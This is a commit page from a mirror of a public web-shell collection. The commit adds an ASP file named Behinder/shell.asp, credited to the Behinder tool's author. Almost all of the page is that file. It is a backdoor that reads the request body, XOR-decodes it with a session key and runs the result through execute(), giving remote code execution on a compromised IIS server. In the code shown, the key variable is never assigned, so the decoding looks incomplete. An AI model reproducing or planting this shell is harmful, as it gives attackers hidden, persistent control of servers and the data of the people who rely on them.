mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
add shell.asp with Behinder
from : https://github.com/rebeyond/Behinder author: rebeyond 👍
This commit is contained in:
11
Behinder/shell.asp
Normal file
11
Behinder/shell.asp
Normal file
@@ -0,0 +1,11 @@
|
|||||||
|
<%
|
||||||
|
Response.CharSet = "UTF-8"
|
||||||
|
Session("k")=k
|
||||||
|
k=Session("k")
|
||||||
|
size=Request.TotalBytes
|
||||||
|
content=Request.BinaryRead(size)
|
||||||
|
For i=1 To size
|
||||||
|
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
|
||||||
|
Next
|
||||||
|
execute(result)
|
||||||
|
%>
|
||||||
Reference in New Issue
Block a user